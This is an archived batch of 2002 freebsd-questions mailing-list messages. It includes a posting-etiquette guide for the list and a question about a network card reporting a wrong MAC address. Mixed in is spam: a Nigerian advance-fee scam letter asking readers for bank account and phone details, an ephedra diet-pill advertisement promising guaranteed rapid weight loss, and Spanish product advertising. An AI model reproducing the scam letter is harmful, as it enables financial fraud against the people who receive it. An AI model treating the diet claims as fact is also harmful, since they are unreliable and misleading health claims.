freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 17:11:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from bgsv5505.tk.mesh.ad.jp (bgsv5504.tk.mesh.ad.jp [210.147.2.4]) by hub.freebsd.org (Postfix) with ESMTP id E20FC37B400 for ; Sun, 23 Jun 2002 17:11:10 -0700 (PDT) Received: from furuhata2 (ntoska050089.ftth.ppp.infoweb.ne.jp) by bgsv5505.tk.mesh.ad.jp (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GY600502OILNO@bgsv5505.tk.mesh.ad.jp> for freebsd-questions@FreeBSD.ORG; Mon, 24 Jun 2002 09:11:10 +0900 (JST) Date: Mon, 24 Jun 2002 09:11:07 +0900 From: kousuke furuhata Subject: To: freebsd-questions@FreeBSD.ORG Message-id: <006c01c21b13$a30e30e0$160b000a@furuhata2> MIME-version: 1.0 X-Mailer: Microsoft Outlook Express 6.00.2600.0000 Content-type: text/plain; charset="iso-2022-jp" Content-transfer-encoding: 7bit X-MSMail-Priority: Normal X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Priority: 3 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG auth 61d8f72d unsubscribe freebsd-questions To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 17:22:26 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.halplant.com (ip68-100-145-31.nv.nv.cox.net [68.100.145.31]) by hub.freebsd.org (Postfix) with ESMTP id E99C737B400 for ; Sun, 23 Jun 2002 17:22:09 -0700 (PDT) Received: by mail.halplant.com (Postfix, from userid 1001) id 2B2561EA; Sun, 23 Jun 2002 20:22:09 -0400 (EDT) Date: Sun, 23 Jun 2002 20:22:09 -0400 From: FreeBSD-Questions Posting Help To: freebsd-questions@FreeBSD.ORG Subject: FreeBSD-Questions Posting Help Message-ID: <20020624002209.GA34705@hal9000.halplant.com> Reply-To: FreeBSD-Questions Posting Help Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Organization: H.A.L. Plant X-Powered-by: FreeBSD 4.6-STABLE X-URL: http://halplant.com:88/ User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG How to get the best results from FreeBSD questions. =================================================== Last update 3 September 1999 This is a regular posting to the FreeBSD questions mailing list. If you got it in answer to a message you sent, it means that the sender thinks that at least one of the following things was wrong with your message: - You left out a subject line, or the subject line was not appropriate. - You formatted it in such a way that it was difficult to read. - You asked more than one unrelated question in one message. - You sent out a message with an incorrect date, time or time zone. - You sent out the same message more than once. - You sent an 'unsubscribe' message to FreeBSD-questions. If you have done any of these things, there is a good chance that you will get more than one copy of this message from different people. Read on, and your next message will be more successful. This document is also available on the web at http://www.lemis.com/questions.html. ===================================================================== Contents: I: Introduction II: How to unsubscribe from FreeBSD-questions III: Should I ask -questions or -hackers? IV: How to submit a question to FreeBSD-questions V: How to answer a question to FreeBSD-questions I: Introduction =============== This is a regular posting aimed to help both those seeking advice from FreeBSD-questions (the "newcomers"), and also those who answer the questions (the "hackers"). Note that the term "hacker" has nothing to do with breaking into other people's computers. The correct term for the latter activity is "cracker", but the popular press hasn't found out yet. The FreeBSD hackers disapprove strongly of cracking security, and have nothing to do with it. In the past, there has been some friction which stems from the different viewpoints of the two groups. The newcomers accused the hackers of being arrogant, stuck-up, and unhelpful, while the hackers accused the newcomers of being stupid, unable to read plain English, and expecting everything to be handed to them on a silver platter. Of course, there's an element of truth in both these claims, but for the most part these viewpoints come from a sense of frustration. In this document, I'd like to do something to relieve this frustration and help everybody get better results from FreeBSD-questions. In the following section, I recommend how to submit a question; after that, we'll look at how to answer one. II: How to unsubscribe from FreeBSD-questions ============================================== When you subscribed to FreeBSD-questions, you got a welcome message from Majordomo@FreeBSD.ORG. In this message, amongst other things, it told you how to unsubscribe. Here's a typical message: Welcome to the freebsd-questions mailing list! If you ever want to remove yourself from this mailing list, you can send mail to "Majordomo@FreeBSD.ORG" with the following command in the body of your email message: unsubscribe freebsd-questions Greg Lehey Here's the general information for the list you've subscribed to, in case you don't already have it: FREEBSD-QUESTIONS User questions This is the mailing list for questions about FreeBSD. You should not send "how to" questions to the technical lists unless you consider the question to be pretty technical. Normally, unsubscribing is even simpler than the message suggests: you don't need to specify your mail ID unless it is different from the one which you specified when you subscribed. If Majordomo replies and tells you (incorrectly) that you're not on the list, this may mean one of two things: 1. You have changed your mail ID since you subscribed. That's where keeping the original message from majordomo comes in handy. For example, the sample message above shows my mail ID as grog@lemis.de. Since then, I have changed it to grog@lemis.com. If I were to try to remove grog@lemis.com from the list, it would fail: I would have to specify the name with which I joined. 2. You're subscribed to a mailing list which is subscribed to FreeBSD-questions. If that's the case, you'll have to figure out which one it is and get your name taken off that one. If you're not sure which one it might be, check the headers of the messages you receive from freebsd-questions: maybe there's a clue there. If you've done all this, and you still can't figure out what's going on, send a message to Postmaster@FreeBSD.org, and he will sort things out for you. Don't send a message to FreeBSD-questions: they can't help you. III: Should I ask -questions, -newbies or -hackers? =================================================== Two mailing lists handle general questions about FreeBSD, FreeBSD-questions and FreeBSD-hackers. In addition, the FreeBSD-newbies list caters specifically for people who are new to FreeBSD and may be having trouble getting used to the environment. In some cases, it's not really clear which group you should ask. The following criteria should help for 99% of all questions, however: If the question is of a general nature, first check whether this isn't a Frequently Asked Question (FAQ). There's a list of these questions at http://www.freebsd.org/FAQ/FAQ.html, and also on your own system (once you've installed it) at /usr/share/doc/FAQ/FAQ.html. Check there, and if you don't find an answer, ask FreeBSD-questions. Examples might be questions about installing FreeBSD or the use of a particular UNIX utility. If you think the question relates to a bug, but you're not sure, or you don't know how to look for it, send the message to FreeBSD-questions. If the question relates to a bug, and you're almost sure that it's a bug (for example, you can pinpoint the place in the code where it happens, and you maybe have a fix), then send the message to FreeBSD-hackers. You should also enter a problem report with the send-pr utility. If the question relates to enhancements to FreeBSD, and you can make suggestions about how to implement them, then send the message to FreeBSD-hackers. If the question is of particularly technical nature, such as implementation details or suggestions for improvements, then send the message to FreeBSD-hackers. If you're new to FreeBSD, and the message is about your own relationship to FreeBSD, send the message to FreeBSD-newbies. There are also a number of other specialized mailing lists, for example FreeBSD-isp, which caters to the interests of ISPs (Internet Service Providers) who run FreeBSD. If you happen to be an ISP, this doesn't mean you should automatically send your questions to FreeBSD-isp. The criteria above still apply, and it's in your interest to stick to them, since you're more likely to get good results that way. IV: How to submit a question ============================= When submitting a question to FreeBSD-questions, consider the following points: 1. Remember that nobody gets paid for answering a FreeBSD question. They do it of their own free will. You can influence this free will positively by submitting a well-formulated question supplying as much relevant information as possible. You can influence this free will negatively by submitting an incomplete, illegible, or rude question. It's perfectly possible to send a message to FreeBSD-questions and not get an answer even if you follow these rules. It's much more possible to not get an answer if you don't. In the rest of this document, we'll look at how to get the most out of your question to FreeBSD-questions. 2. Not everybody who answers FreeBSD questions reads every message: they look at the subject line and decide whether it interests them. Clearly, it's in your interest to specify a subject. ``FreeBSD problem'' or ``Help'' aren't enough. If you provide no subject at all, many people won't bother reading it. If your subject isn't specific enough, the people who can answer it may not read it. 3. Format your message so that it is legible, and PLEASE DON'T SHOUT!!!!!. We appreciate that a lot of people don't speak English as their first language, and we try to make allowances for that, but it's really painful to try to read a message written full of typos or without any line breaks. A lot of badly formatted messages come from bad mailers or badly configured mailers. The following mailers are known to send out badly formatted messages without you finding out about them: Eudora exmh Microsoft Exchange Microsoft Internet Mail Microsoft Outlook Netscape As you can see, the mailers in the Microsoft world are frequent offenders. If at all possible, use a UNIX mailer. If you must use a mailer under Microsoft environments, make sure it is set up correctly. Try not to use MIME: a lot of people use mailers which don't get on very well with MIME. For further information on this subject, check out http://www.lemis.com/email.html. 4. Make sure your time and time zone are set correctly. This may seem a little silly, since your message still gets there, but many of the people you are trying to reach get several hundred messages a day. They frequently sort the incoming messages by subject and by date, and if your message doesn't come before the first answer, they may assume they missed it and not bother to look. 5. Don't include unrelated questions in the same message. Firstly, a long message tends to scare people off, and secondly, it's more difficult to get all the people who can answer all the questions to read the message. 6. Specify as much information as possible. This is a difficult area, and we need to expand on what information you need to submit, but here's a start: If you get error messages, don't say ``I get error messages'', say (for example) ``I get the error message 'No route to host'''. If your system panics, don't say ``My system panicked'', say (for example) ``my system panicked with the message 'free vnode isn't'''. If you have difficulty installing FreeBSD, please tell us what hardware you have. In particular, it's important to know the IRQs and I/O addresses of the boards installed in your machine. If you have difficulty getting PPP to run, describe the configuration. Which version of PPP do you use? What kind of authentication do you have? Do you have a static or dynamic IP address? What kind of messages do you get in the log file? 7. If you don't get an answer immediately, or if you don't even see your own message appear on the list immediately, don't resend the message. Wait at least 24 hours. The FreeBSD mailer offloads messages to a number of subordinate mailers around the world, and sometimes it can take several hours for the mail to get through. And once it gets through, the one person who might know the answer will probably just have gone to bed in his part of the world. 8. If you do all this, and you still don't get an answer, there could be other reasons. For example, the problem is so complicated that nobody knows the answer, or the person who does know the answer was offline. If you don't get an answer after, say, a week, it might help to re-send the message. If you don't get an answer to your second message, though, you're probably not going to get one from this forum. Resending the same message again and again will only make you unpopular. To summarize, let's assume you know the answer to the following question (yes, it's the same one in each case :-). You choose which of these two questions you would be more prepared to answer: Message 1: Subject: (none) I just can't get hits damn silly FereBSD system to workd, and Im really good at this tsuff, but I have never seen anythign sho difficult to install, it jst wont work whatever I try so why don't y9ou guys tell me what I doing wrong. ---------------------------------------------------------------------- Message 2: Subject: Problems installing FreeBSD I've just got the FreeBSD 2.1.5 CD-ROM from Walnut Creek, and I'm having a lot of difficulty installing it. I have a 66 MHz 486 with 16 MB of memory and an Adaptec 1540A SCSI board, a 1.2GB Quantum Fireball disk and a Toshiba 3501XA CD-ROM drive. The installation works just fine, but when I try to reboot the system, I get the message "Missing Operating System". ---------------------------------------------------------------------- V: How to follow up to a question ================================= Often you will want to send in additional information to a question you have already sent. The best way to do this is to reply to your original message. This has three advantages: 1. You include the original message text, so people will know what you're talking about. Don't forget to trim unnecessary text out, though. 2. The text in the subject line stays the same (you did remember to put one in, didn't you?). Many mailers will sort messages by subject. This helps group messages together. 3. The message reference numbers in the header will refer to the previous message. Some mailers, such as mutt, can thread messages, showing the exact relationships between the messages. VI: How to answer a question ============================ Before you answer a question to FreeBSD-questions, consider: 1. A lot of the points on submitting questions also apply to answering questions. Read them. 2. Has somebody already answered the question? The easiest way to check this is to sort your incoming mail by subject: then (hopefully) you'll see the question followed by any answers, all together. If somebody has already answered it, it doesn't automatically mean that you shouldn't send another answer. But it makes sense to read all the other answers first. 3. Do you have something to contribute beyond what has already been said? In general, "Yeah, me too" answers don't help much, although there are exceptions, like when somebody is describing a problem he's having, and he doesn't know whether it's his fault or whether there's something wrong with the hardware or software. If you do send a "me too" answer, you should also include any further relevant information. 4. Are you sure you understand the question? Very frequently, the person who asks the question is confused or doesn't express himself very well. Even with the best understanding of the system, it's easy to send a reply which doesn't answer the question. This doesn't help: you'll leave the person who submitted the question more frustrated or confused than ever. If nobody else answers, and you're not too sure either, you can always ask for more information. 5. Are you sure your answer is correct? If not, wait a day or so. If nobody else comes up with a better answer, you can still reply and say, for example, "I don't know if this is correct, but since nobody else has replied, why don't you try replacing your ATAPI CD-ROM with a frog?". 6. Unless there's a good reason to do otherwise, reply to the sender and to FreeBSD-questions. Many people on the FreeBSD-questions are "lurkers": they learn by reading messages sent and replied to by others. If you take a message which is of general interest off the list, you're depriving these people of their information. Be careful with group replies; lots of people send messages with hundreds of CCs. If this is the case, be sure to trim the Cc: lines appropriately. 7. Include relevant text from the original message. Trim it to the minimum, but don't overdo it. It should still be possible for somebody who didn't read the original message to understand what you're talking about. 8. Use some technique to identify which text came from the original message, and which text you add. I personally find that prepending ``> '' to the original message works best. Leaving white space after the ``> '' and leave empty lines between your text and the original text both make the result more readable. 9. Put your response in the correct place (after the text to which it replies). It's very difficult to read a thread of responses where each reply comes before the text to which it replies. 10. Most mailers change the subject line on a reply by prepending a text such as ``Re: ''. If your mailer doesn't do it automatically, you should do it manually. 11. If the submitter didn't abide by format conventions (lines too long, inappropriate subject line), please fix it. In the case of an incorrect subject line (such as ``HELP!!??''), change the subject line to (say) ``Re: Difficulties with sync PPP (was: HELP!!??)''. That way other people trying to follow the thread will have less difficulty following it. In such cases, it's appropriate to say what you did and why you did it, but try not to be rude. If you find you can't answer without being rude, don't answer. If you just want to reply to a message because of its bad format, just reply to the submitter, not to the list. You can just send him this message in reply, if you like. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 17:30: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from priv-edtnes04.telusplanet.net (fepout2.telus.net [199.185.220.237]) by hub.freebsd.org (Postfix) with ESMTP id B1ACB37B400 for ; Sun, 23 Jun 2002 17:29:54 -0700 (PDT) Received: from gcooper ([209.107.97.90]) by priv-edtnes04.telusplanet.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP id <20020624002954.CUIL14925.priv-edtnes04.telusplanet.net@gcooper> for ; Sun, 23 Jun 2002 18:29:54 -0600 Message-ID: <001101c21b1d$b3d9eb80$5a616bd1@ab.hsia.telus.net> From: "Grant Cooper" To: "FBSDQ" References: Subject: Getting Wrong MAC address Date: Sun, 23 Jun 2002 19:23:09 -0600 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000E_01C21AEB.68EB8F20" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_000E_01C21AEB.68EB8F20 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Correct me if I'm wrong, ifconfig dc0 | grep ether | awk '{print $2}' will give me the MAC address.=20 I get 04:00:04:00:04:00 when it should be 0:C0:26:C0:B6:B2 I am using a CICERO ADMtek AN985 card. I know it works because I tested = it on my other win 98 box. The probe recognize's it as a dc0: device. ------=_NextPart_000_000E_01C21AEB.68EB8F20 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Correct me if I'm wrong,
ifconfig dc0 | grep ether | awk '{print = $2}'
will give me the MAC address. =
 
I get 04:00:04:00:04:00 when it should be 0:C0:26:C0:B6:B2
 
I am using a CICERO ADMtek AN985 card. = I know it=20 works because I tested it on my other win 98 box. The probe recognize's = it as a=20 dc0: device.
------=_NextPart_000_000E_01C21AEB.68EB8F20-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 17:34:16 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hub.FreeBSD.org (host-64-110-76-217.interpacket.net [64.110.76.217]) by hub.freebsd.org (Postfix) with SMTP id DB6F937B401 for ; Sun, 23 Jun 2002 17:34:02 -0700 (PDT) From: "BARR. BELLO MUSA" Date: Mon, 24 Jun 2002 01:42:16 To: freebsd-questions@FreeBSD.org Subject: URGENT MIME-Version: 1.0 Content-Type: text/plain;charset="iso-8859-1" Content-Transfer-Encoding: 7bit Message-Id: <20020624003402.DB6F937B401@hub.freebsd.org> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ATTN:SIR AM WRITING TO YOU FOLLOWING THE IMPRESSIVE INFORMATION I GOT ABOUT YOU THROUGH A CONSULTANCY FIRM UNDER NIGERIAN BAR ASSOCIATION. HE ASSURED ME OF YOUR CAPABILITY AND RELIABILITY TO CHAMPION THIS BUSINESS OPPORTUNITY. IN A FORMAL INTRODUCTION I AM BARRISTER BELLO MUSA. A SOLICITOR AT LAW AND SENIOR ADVOCATE OF NIGERIA (SAN) EQUALY AN ATTORNEY TO ONE OF YOUR NATIONALS WHO RUNS A CONTRACTING FIRM IN NIGERIA AFTER SHALL BE REFERRED AS MY CLIENT.ON JANUARY 4TH 1998 MY CLIENT, HIS WIFE&THEIR THREE CHILDREN WERE INVOLVED IN GHASTLY AUTO CRASH AND UNFORTUNATELY ALL LOST THEIR LIVES, SINCE THEN I HAVE MADE SEVERAL ENQUIRIES TO YOUR EMBASSY TO LOCATE ANY OF MY CLIENT'S EXTENDED RELATIVES, THIS HAS ALSO PROVED ABORTIVE,AFTER THESE SEVERAL UNSUCCESSFUL ATTEMPTS, TO LOCATE ANY MEMBER OF HIS FAMILY TO PRESENT AS NEXT OF KIN IN RESPECT OF THE SUM OF US$23.5M(TWENTY THREE MILLION FIVE HUNDRED THOUSAND UNITED STATES DOLLARS ONLY) DEPOSITED WITH UNION BANK OF NIGERIA BY MY LATE CLIENT OF WHICH THE BANK HAS CONTACTED ME TO PROVIDE THE NEXT OF KIN TO MY CLIENT TO COME OVER AND CLAIM HIS MONEY BECAUSE THEY CANNOT RELEASE IT UNLESS SOMEBODY APPLIES THROUGH ME FOR IT, AS NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN THEIR BANKING GUIDELINES. AS NOBODY WAS LEFT BEHIND FOR THE CLAIM. IT IS THEREFORE UPON THIS DISCOVERY THAT I NOW DECIDED TO MAKE BUSINESS WITH YOU AND PROCESS THE RELEASE / TRANSFER OF THE MONEY TO YOU AS THE NEXT OF KIN OR RELATIONS OF MY DECEASED CLIENT FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND I DON'T WANT THIS MONEY TO GO INTO DISBURSEMENT ACCOUNT AS UNCLAIMED BILLAS THE BANKING LAW AND GUIDELINES WHERE THE DEPOSITE WAS MADE STIPULATED THAT IF SUCH MONEY REMAINED UNCLAIMED AFTER FOUR YEARS THE MONEY WILL BE TRANSFERRED INTO FEDERAL GOVERNMENT ACCOUNT AS UNCLAIMED FUND HENCE THEY HAVE NOTIFIED ME OF THE DEVELOPMENT AND INSTRUCTED ME TO PROVIDE THE NEXT OF KIN WITHIN 14 DAYS. THE REQUEST OF A FOREIGNER AS NEXT OF KIN IN THIS BUSINESS IS OCCASIONED BY THE FACT THAT MY CLIENT WAS A FOREIGNER AND A NIGERIAN CANNOT STAND AS NEXT OF KIN TO A FOREIGNER. I AGREE THAT 40% OF THIS MONEY WILL BE FOR YOU AS FOREIGN PARTNER AND 10% FOR EXPENSES INCURRED DURING THE COURSE OF REMITTANCE & 50% FOR ME THEREAFTER TO THE PERCENTAGES INDICATED. THEREFORE TO ENABLE THE IMMEDIATE PROCESSING OF THE TRANSFER OF THE FUND TO YOU AS ARRANGED. YOU MUST PROVIDE ACCOUNT PARTICULARS WHICH I WILL USE TO APPLY TO THE BANK REFERRING YOU AS THE NEXT OF KIN /RELATION OF MY DECEASED CLIENT INDICATING YOUR BANK ACCOUNT NUMBER AND LOCATION WHERE IN THE MONEY WILL BE REMITTED . UPON RECEIPT OF YOUR REPLY I WILL BRIEF YOU DEEPLY ON HOW EVERY THING WILL BE DONE AS YOU RECEIVE THIS LETTER& WILLING TO ASSIST IN THIS ONES IN LIFE TIME OPPORTUNITY, YOU SHOULD CONTACT ME AT ONCE THROUGH THE EMAIL ADDRESSES ONLY AND INDICATE YOUR DIRECT CONFIDENTIAL TELEPHONE/FAX NUMBERS FOR THE EFFECTIVE COMMUNICATION REQUIRED I ADVISE YOU TO GIVE THIS TRANSACTION THE MAXIMUM CONFIDENTIALITY IT REQUIRES BECAUSE OF IT'S NATURE AND I WILL NOT LIKE TO DENT MY IMAGE . TRUSTING TO HEARING FORM YOU IMMEDIATELY. YOURS FAITHFULLY, BARRISTER BELLO MUSA CONTACT ME THROUGH THIS TEL/FAX 234-1-7596854 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 18:16:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailserver.thevillagestore.com (h-64-105-180-186.ATLNGAHP.covad.net [64.105.180.186]) by hub.freebsd.org (Postfix) with ESMTP id 964B437B400 for ; Sun, 23 Jun 2002 18:16:38 -0700 (PDT) Received: from . (wks1.plpr.cncn.oh.voyager.net [207.90.65.161]) by mailserver.thevillagestore.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id NFAHCCFX; Sun, 23 Jun 2002 13:10:25 -0400 Message-ID: <000064c223b7$000049b7$0000177a@.> To: , , , , , , Cc: , , , , , , , From: cristy108@hotmail.com Subject: Lose 27 Pounds In 14 Days 624 Date: Sun, 23 Jun 2002 20:16:34 -1700 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hey there, If you're like me, you've tried EVERYTHING to lose weight.  I know how you feel - the special diets, miracle pills, and fancy exercise equipment never helped me lose a pound either.  It seemed like the harder I tried, the bigger I got, until I heard about a product called Extreme Power Plus. You're probably thinking to yourself, "Oh geez, not another miracle diet pill!"  Like you, I was skeptical at first, but my sister swore it helped her lose 23 pounds in just two weeks, so I told her I'd give it a shot.  I mean, there was nothing to lose except a lot of weight!  Let me tell you, it was the best decision I've ever made. Period.  Six months later, as I'm writing this message to you, I've gone from 355 pounds to 210 pounds, and I haven't changed my exercise routine or diet at all.  Yes, I still eat pizza, and lots of it! I was so happy with the results that I contacted the manufacturer and got permission to resell it - at a BIG discount.  I want to help other people lose weight like I did, because it does so much for your self-esteem, not to mention your health. I give you my personal pledge that Extreme Power Plus absolutely WILL WORK FOR YOU.  If it doesn't, you can return it any time for a full refund. Interested, visit http://www.2002marketing.com/index.shtml    If you are frustrated with trying other products, not having any success, and just not getting the results you were promised, then I recommend the only product that worked for me - EXTREME POWER PLUS. You're probably asking yourself, "Ok, so how does this stuff actually work?" Extreme Power Plus contains Lipotropic fat burners and ephedra which is scientifically proven to increase metabolism and cause rapid weight loss. No "hocus pocus" in these pills - just RESULTS, RESULTS, RESULTS!! Here is the bottom line ... I can help you lose 10-15 pounds per week naturally, without exercising and without having to eat rice cakes all day.  Just try it for one month - there's nothing to lose, and everything to gain.  You will lose weight fast - GUARANTEED.  That is my pledge to you.  To order Extreme Power Plus on our secure server, just click on the link below: http://www.2002marketing.com/order.shtml To see what some of our customers have said about this product, visit http://www.2002marketing.com/testimonials.shtml To see a list of ingredients and for more information on test studies and how it will help you lose weight, visit http://www.2002marketing.com/ingre1.shtml ************************************************************* If you do not wish to receive any more emails from me, please send an email to "affiliate2@btamail.net.cn" requesting to be removed. ************************************************************* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 18:19:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from thor.sonimag.net (217-127-31-182.uc.nombres.ttd.es [217.127.31.182]) by hub.freebsd.org (Postfix) with ESMTP id D87AA37B401; Sun, 23 Jun 2002 18:13:48 -0700 (PDT) Received: from thor.sonimag.net (localhost [127.0.0.1]) by thor.sonimag.net (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id g5NCsfB05559; Sun, 23 Jun 2002 14:54:55 +0200 Received: from llca114.servidoresdns.net (llca114.servidoresdns.net [217.76.128.82]) by thor.sonimag.net (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id g5JJ4Os01668 for ; Wed, 19 Jun 2002 21:04:24 +0200 Received: from jose (217-127-31-182.uc.nombres.ttd.es [217.127.31.182]) by llca114.servidoresdns.net (8.11.0/8.10.2) with SMTP id g5JJ4kD11413 for ; Wed, 19 Jun 2002 21:04:47 +0200 Message-ID: <002601c217c3$ca7fa620$0100c0a8@jose> From: "Hispanet Technology" To: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0022_01C217D4.8D47E540" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Subject: [Publicidad] ABGYMNIC + RELOJES GENEVA X-BeenThere: publicidad@sonimag.net X-Mailman-Version: 2.0.10 List-Help: List-Post: List-Subscribe: , List-Id: Lista de Publicidad List-Unsubscribe: , List-Archive: Date: Wed, 19 Jun 2002 21:01:58 +0200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0023_01C217D4.8D47E540" ------=_NextPart_001_0023_01C217D4.8D47E540 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable WWW.OBJETS.NET KIT SPORT 2002 ABGYMNIC 2002 GIMNASIA PASIVA, 10 MINUTOS EQUIVALEN A 600 FLEXIONES DE ABDOMINALES -CENTRAL CON 6 PROGRAMAS=20 -CONTROL DE INTENSIDAD - 2 CINTURONES, UNO PARA PECTORALES Y ABDOMINALES, OTRO PARA BRAZOS Y = PIERNAS - 2 PILAS (1 DE REPUESTO) - MANUAL DE INSTRUCCIONES EN CASTELLANO - 1 A=D1O DE GARANTIA + PAREJA DE RELOJES GENEVA CON CHAPADO EN ORO, EN ESTUCHE DE LUJO PVP: 42 ? IVA INCLUIDO PORTES POR Y GASTOS DE REEMBOLSO NO INCLUIDOS EN EL PRECIO IMPORTANTE:=20 NO ACEPTE EQUIPOS SIN GARANTIA (MATERIAL DEFECTUOSO A BAJO COSTE) SOLAMENTE OBJETS.NET (HISPANET-TECHNOLOGY.COM) OFRECE GARANTIA TOTAL PEDIDOS: MANDAR E-MAIL O FAX CON LOS SIGUIENTES DATOS: -NOMBRE O RAZON SOCIAL -CIF/NIF -TELEFONO DE CONTACTO -DIRECCION Y CODIGO POSTAL TLF: 902 30 12 30 FAX: 954 27 92 02 E-MAIL: pedidos@objets.net VENTA CONTRAREEMBOLSO A TODA ESPA=D1A (SI NO QUEDA SATISFECHO, LE DEVOLVEMOS SU DINERO) Oferta valida salvo error tipogr=E1fico o fin de existencias. Si ha recibido este mensaje por error o desea que le borremos de nuestra base de datos, puede darse de baja reenviando este mensaje poniendo en = el asunto REMOVE. Este mensaje se env=EDa en concordancia con la nueva legislaci=F3n sobre = correo electr=F3nico:Por secci=F3n 301,p=E1rrafo (a)(2)(c) de S.1618 Bajo el = decreto S.1618 t=EDtulo 3ro. aprobado por el 105 congreso base de las normativas internacionales sobre SPAM, este E-mail no podr=E1 ser considerado SPAM mientras incluya una forma de ser removido.=20 ------=_NextPart_001_0023_01C217D4.8D47E540 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
WWW.OBJETS.NET=
KIT=20 SPORT 2002
 
3D"ABGYMNIC
ABGYMNIC=20 2002
GIMNASIA PASIVA,=20 10 MINUTOS EQUIVALEN A 600 FLEXIONES DE = ABDOMINALES
 
-CENTRAL CON 6 PROGRAMAS =
-CONTROL DE=20 INTENSIDAD
- 2 CINTURONES, = UNO PARA=20 PECTORALES Y ABDOMINALES, OTRO PARA BRAZOS Y = PIERNAS
- 2 PILAS (1 DE=20 REPUESTO)
- MANUAL DE = INSTRUCCIONES EN=20 CASTELLANO
-=20 1 A=D1O DE = GARANTIA
+
3D""
 
PAREJA DE = RELOJES GENEVA CON=20 CHAPADO EN ORO, EN ESTUCHE DE LUJO
PVP: 42 =80 IVA=20 INCLUIDO
PORTES = POR =20 Y GASTOS DE REEMBOLSO NO INCLUIDOS EN EL=20 PRECIO
 
IMPORTANTE:
NO=20 ACEPTE EQUIPOS SIN GARANTIA (MATERIAL DEFECTUOSO A = BAJO=20 COSTE)
SOLAMENTE OBJETS.NET=20 (HISPANET-TECHNOLOGY.COM) OFRECE GARANTIA TOTAL
 
PEDIDOS:
MANDAR E-MAIL O = FAX CON LOS=20 SIGUIENTES DATOS:
-NOMBRE O RAZON=20 SOCIAL
-CIF/NIF
-TELEFONO DE=20 CONTACTO
-DIRECCION Y = CODIGO=20 POSTAL
 
TLF: 902 30 12=20 30
FAX: 954 27 92=20 02
 

VENTA = CONTRAREEMBOLSO A TODA=20 ESPA=D1A

(SI NO QUEDA SATISFECHO, = LE=20 DEVOLVEMOS SU DINERO)

Oferta valida salvo error tipogr=E1fico o fin de = existencias.

Si ha recibido este mensaje por error o desea que le borremos de=20 nuestra
base de datos, puede darse de baja reenviando este mensaje = poniendo=20 en el asunto REMOVE.

Este mensaje se env=EDa en concordancia con la nueva legislaci=F3n = sobre=20 correo
electr=F3nico:Por secci=F3n 301,p=E1rrafo (a)(2)(c) de S.1618 = Bajo el=20 decreto
S.1618 t=EDtulo 3ro. aprobado por el 105 congreso base de las = normativas
internacionales sobre SPAM, este E-mail no podr=E1 ser = considerado=20 SPAM
mientras incluya una forma de ser removido.
=

